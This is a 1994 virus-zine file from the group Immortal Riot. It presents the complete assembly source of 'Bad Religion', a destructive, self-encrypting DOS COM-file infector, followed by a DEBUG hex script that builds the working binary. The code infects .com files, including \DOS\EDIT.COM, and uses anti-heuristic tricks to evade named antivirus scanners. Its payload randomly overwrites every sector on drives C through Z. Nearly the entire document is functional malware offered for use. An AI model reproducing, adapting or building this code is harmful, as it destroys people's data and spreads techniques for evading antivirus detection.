Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 009 ; ------------------------------------------------------------------------------ ; ; - Bad Religion - ; Created by Immortal Riot's destructive development team ; (c) 1994 The Unforgiven/Immortal Riot ; ; ------------------------------------------------------------------------------ ; þ Undetectable/Destructive COM-infector þ ; ------------------------------------------------------------------------------ Replicating: This virus is pretty much alike faces of death, but this is a bit smaller bcos it doesnt include an extra virus. Ofcos it got some other routines added instead.. Pay-Load: There is a one percent each time an infected file is executed that all harddrives will be wiped out. Anti-Virus-Detection: No anti-virus scanners can detect anything from this code, this is due to its encryption routine, and some anti-anti-virus code included. Name: I wanted to write a virus with the name Bad Religion. Why you might ask? Well, consider 90% of the wars today/in the past are results of different religious beliefs I would call religion pretty fucking bad. I also like the music group with the above named name a lot! .model tiny .radix 16 .code org 100h start: storbuf db 00,00,00,00 ; for first generation only! v_start: mov sp,102h ; get the delta offset so tbscan cant call get_delta ; flag it as flexible entry point get_delta: ; mov bp,word ptr ds:[100h] mov sp,0fffeh sub bp,offset get_delta go_back: mov ax,0305h ; this code was included to avoid detection xor bx,bx ; from tbscan. The vsafe disabeling code can int 16h ; be used as well, but f-prot heuristics ; complains about it. call en_de_crypt ; decrypt the virus jmp short real_start ; and continue... encrypt_value dw 0 ; random xor (encryption) value write_virus: call en_de_crypt ; write encrypted copy of the virus mov ah,40 ; mov cx,code_end-v_start ; # bytes lea dx,[bp+v_start] ; dx:100h int 21 ; call en_de_crypt ; decrypt virus again for further processing ret en_de_crypt: mov ax,word ptr [bp+encrypt_value] lea si,[bp+real_start] mov cx,(enc_end-real_start+1)/2 xor_loopie: xor word ptr [si],ax ; encrypts two bytes/loop until all inc si ; code between real_start and enc_end inc si ; are encrypted loop xor_loopie ret real_start: mov ah,2ch ; get time of 1/100 of a second value from int 21h ; the system clock cmp dl,58d ; value == 58d jne get_drive ; nope! mov al,2 drive: ; routine to overwrite all sectors mov cx,1 ; on all drives from drive C-Z: lea bx,[bp+v_name] ; cwd Next_Sector: int 26h inc dx jnc next_sector inc al jmp short drive get_drive: mov ah,19h ; get drive from where we are executed from int 21h ; check if it's a: or b: cmp al,2 ; if so, return control to the original jb quit ; program without infecting other files lea si,[bp+org_buf] ; copy the first four bytes mov di,100 ; of the file, into a buffer movsw ; called org_buf movsw ; lea dx,[bp+code_end] ; set our own dta to code_end, so mov ah,1ah ; the paramters when findfiles arent int 21h ; destroyed lea dx,[bp+direct_infect] ; if present, infect call dirinfect ; \dos\edit.com mov ah,4e ; search for com files lea dx,[bp+com_files] ; find_next: int 21 jc no_more_files ; no more files find, exit! call infect ; found a find, infect it! mov ah,4f ; search next file jmp short find_next ; and see if we find one no_more_files: ; mov dx,80 ; set the dta to 80h (default) mov ah,1ah int 21h quit: ; mov di,100 ; return control to original program push di ; ret infect: lea dx,[bp+code_end+1e] ; 1e = adress to filename in ds:dx in our ; new dta area! dirinfect: mov ax,3d02 ; open file int 21 ; in read/write mode jnc infect_it ; if the file \dos\edit.com doesnt exist ret ; return, and search first comfile infect_it: xchg bx,ax ; filehandle in bx mov ax,5700 ; get time/date int 21 push dx ; save date push cx ; save time mov ah,3f ; read the first four bytes mov cx,4 ; of the file to org_buf lea dx,[bp+org_buf] int 21 cmp byte ptr [bp+org_buf+3],03h ; previous infected (heart) jz finish_infect ; cmp word ptr [bp+org_buf],9090h ; double nop jz finish_infect ; cmp word ptr [bp+org_buf],5a4dh ; ZM (exe file) jz finish_infect ; cmp word ptr [bp+org_buf],4d5ah ; MZ (exe-file) jz finish_infect ; cmp byte ptr [bp+org_buf+1],6Dh ; command.com jz finish_infect ; mov ax, word ptr [bp+code_end+1ah] ; virus size * 2 cmp ax,762d ; jb finish_infect cmp ax,65156d ; 1024 * 64 - virus size ja finish_infect ; mov ax,4202 ; move file-pointer xor cx,cx ; to end of file cwd int 21 sub ax,3 ; substract bytes mov word ptr [bp+first_four+1],ax ; to our own jump get_value: mov ah,2ch ; get system clock for int 21h ; 1/100 of a second jz get_value ; if zero = get new value mov word ptr [bp+encrypt_value],dx ; otherwise, use as enc value call write_virus ; write virus to end of file mov ax,4200 ; move file-pointer to xor cx,cx ; top of file cwd int 21 mov ah,40 ; write our own jump mov cx,4 ; instruction to the lea dx,[bp+first_four] ; beginning int 21 finish_infect: mov ax,5701 ; set back pop cx ; time pop dx ; date int 21 ; mov ah,3e ; close file int 21 ret ; return and continue! v_name db "[Bad Religion] (c) 1994 The Unforgiven/Immortal Riot" direct_infect db '\DOS\EDIT.COM',0 com_files db '*.com',0 first_four db 0e9,90,90,03 ; buffer to calculate a new entry org_buf: db 90,90,0CDh,20 ; buffer to save first four bytes in enc_end: code_end: end start -------------------------------------------------------------------------------- N religion.com E 100 00 00 00 00 BC 02 01 E8 00 00 8B 2E 00 01 BC FE E 110 FF 81 ED 0A 01 B8 05 03 33 DB CD 16 E8 16 00 EB E 120 26 00 00 E8 0F 00 B4 40 B9 7D 01 8D 96 04 01 CD E 130 21 E8 01 00 C3 8B 86 21 01 8D B6 47 01 B9 9D 00 E 140 31 04 46 46 E2 FA C3 B4 2C CD 21 80 FA 3A 75 13 E 150 B0 02 B9 01 00 8D 9E 31 02 99 CD 26 42 73 FB FE E 160 C0 EB EF B4 19 CD 21 3C 02 72 2E 8D B6 7D 02 BF E 170 00 01 A5 A5 8D 96 81 02 E8 B1 00 8D 96 65 02 E8 E 180 20 00 B4 4E 8D 96 73 02 CD 21 72 07 E8 0F 00 B4 E 190 4F EB F5 BA 80 00 E8 93 00 BF 00 01 57 C3 8D 96 E 1a0 9F 02 B8 02 3D CD 21 73 01 C3 93 B8 00 57 CD 21 E 1b0 52 51 B4 3F B9 04 00 8D 96 7D 02 CD 21 80 BE 80 E 1c0 02 03 74 5C 81 BE 7D 02 90 90 74 54 81 BE 7D 02 E 1d0 4D 5A 74 4C 81 BE 7D 02 5A 4D 74 44 80 BE 7E 02 E 1e0 6D 74 3D 8B 86 9B 02 3D 28 03 72 34 3D 83 FE 77 E 1f0 2F B8 02 42 33 C9 99 CD 21 2D 03 00 89 86 7A 02 E 200 B4 2C CD 21 74 FA 89 96 21 01 E8 16 FF B8 00 42 E 210 33 C9 99 CD 21 B4 40 B9 04 00 8D 96 79 02 CD 21 E 220 B8 01 57 59 5A CD 21 B4 3E CD 21 C3 B4 1A CD 21 E 230 C3 5B 42 61 64 20 52 65 6C 69 67 69 6F 6E 5D 20 E 240 28 63 29 20 31 39 39 34 20 54 68 65 20 55 6E 66 E 250 6F 72 67 69 76 65 6E 2F 49 6D 6D 6F 72 74 61 6C E 260 20 52 69 6F 74 5C 44 4F 53 5C 45 44 49 54 2E 43 E 270 4F 4D 00 2A 2E 63 6F 6D 00 E9 90 90 03 90 90 CD E 280 20 RCX 181 W Q